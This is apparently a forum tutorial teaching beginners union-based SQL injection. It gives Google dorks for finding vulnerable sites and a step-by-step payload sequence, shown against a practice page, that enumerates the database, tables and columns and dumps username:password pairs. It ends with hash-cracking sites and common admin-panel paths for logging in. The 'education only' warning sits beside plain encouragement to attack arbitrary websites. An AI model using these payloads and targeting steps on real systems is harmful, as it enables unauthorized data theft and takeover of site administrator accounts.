Union based SQL Injection 100% noob [BASIC]

!! WARNING FOR EDUCATION PURPOSE ONLY !!

I : Table Of Contents
I : table of contents
II : introduction
Step 1 : Learning basics
Step 2 : Finding target Website
Step 3 : Cheking if vulnerable to SQL Injection
Step 4 : Getting vulnerable columns
Step 5 : Getting injectable column

Step 6 : Getting Version
Step 7 : Getting database

Step 8 : Getting tables
Step 9 : Getting columns
Step 10 : Dumping data
Step 11 : Logging in to admin panel or login panel
Tips
Goodbye

II : Introduction

So this is my first tutorial and my second post..
Today im gonna teach you about ummm let see what i can teach, about how to watch pr0nz i mean how to hack a website through sql injection

Step 1 : Learning basics
1)Google dorks
what is google dorks? Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we really dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5

so whats next?

2)SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia

3)SQL injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database

so after learning some basics. We will now proceed to another basic. basic sql injection 100% for noob learner.

Step 2 : Finding target website
google : " inurl:news.php?id= "
You can do your own google dork if you want, the common dorks is

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

so get some target and lets start.

Step 3 : Checking if vulnerable to SQL Injection
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

You'll add a colon " ' " to the end of the number
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

now if you see an errored text or lookes like the page doesnt look normal, then theres a chance that its vulnerable to SQL injection
but if the page loads normally, too bad. Its not vulnerable.

What to do if its not vulnerable?
ofcourse find another website xD

Step 4 : Getting vulnerable columns
After you find it vulnerable to SQL injection, its time to count the columns using the order by.
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 1--
increase the number 1 until you you get an error

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 1-- ("No error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 2-- ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 10--("No error?!")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 100000--("No error?!!")

So if that things happen you got in 99999 and still no error.
that means the ID is a string, not integer.

So how we will fix it?
Just simply add " ' " after the start and add " + " in the end.
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+

Start:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+ ("Error!!!!")

Error While Selection process : Unknown column '4' in 'order clause'

There we go! we know that there is 3 columns. Now we will check now what is the injectable column!

Question:
What is the " -- "
the -- is a comment

Step 5 : Getting Injectable column
We will now get the injectable column! So there is 3 columns. so
simply add a negative sign ( - ) before the number and add union select

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+

And there it is!
Username is : 2

The Column 2 is injectable! So we will inject our Malicious SQL Statement!

Step 6 : Checking version
So before getting informations, lets check the version first by simply changing the 2 to @@version . so:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,@@version,3--+

Username is : 5.5.48-cll

If The version is greater than or equal to 5 then you can proceed if its lessthan 5 then too bad i recommend you to change target website but if you really wanna hack it then i suggest you to try Blind SQL in other tutorials but its so hard so i never tried it

Step 7 : Getting database
Now we got the injectable column, we will now check the name of database!
Simply change the 2 to database()
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,database(),3--+

There ya go!
Username is : leettime_761wHole

Now we know that the database name is leettime_761wHole

Save the database name, we will use it.

Step 8 : Getting tables
After we get the database name, we will now get the table of database.
go to http://shunz19.blogspot.com/2016/04/string-tools.html and hex the database name

Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
then add 0x in the start so "0x6c65657474696d655f37363177486f6c65"

So simply change the 2 to (select group_concat(table_name) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65)

So it will be:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65),3--+

and there you go!
Username is : testtable1,userlogs,users

We got the tables! Now we have to get the columns.

Step 9 : Getting columns
Just hold on! we're close now. Now we have to get the columns.
Again you need to hex the table name and add 0x in the start so
Users = " 0x7573657273 "
then simply change the 2 to (select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)

so the link will be
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

There we go again!
Username is : id,username,password,user_type,sec_code

Step 10 : Dumping data
So this will be the easiest one i think? because its dump data time!!
simply change the 2 to (select group_concat(columns) from database.table)
so (select group_concat(username,password) from leettime_761wHole.users)

So the link will be:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(username,password) from leettime_761wHole.users),3--+

And now :D
Username is : injectorkhan,decompilerhacktract,devilhuntedante,Zensec-idiots,Zenodermussecurity-i,grayhathacker,khanhaxor,adminsadmin

Oh wait we forgot the seperator! lets just simply add 0x3a.
What is 0x3a?
0x3a when decoded to hex is " : " we will use it as seperator for our columns to recognize what is username and password. group_concat(username,0x3a,password)

so:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(username,0x3a,password) from leettime_761wHole.users),3--+
Username is : injector:khan,decompiler:hacktract,devilhunte:dante,Zen:sec-idiots,Zenodermus:security-i,grayhat:hacker,khan:haxor,admin:sadmin
Yeah there ya go time for checking from some admin panel to access

Step 11 : Logging in to admin panel or login panel
some passwords are hashed to md5 you can crack the hash using md5online.com , crackstation.net , hash-killer.co.uk and etc

So now we got the login credentials, we will now get the login page or admin page to login to have access in the site.
There is common links:
www.website.com/admin
www.website.com/administrator
www.website.com/login.php
www.website.com/admin.php
www.website.com/administrator.php

Tips
If you want to check all the database this is the code:
(select group_concat(schema_name) from information_schema.schemata)

Goodbye
Hope you enjoyed my post and learned something! If you have questions or feedback please feel free to comment!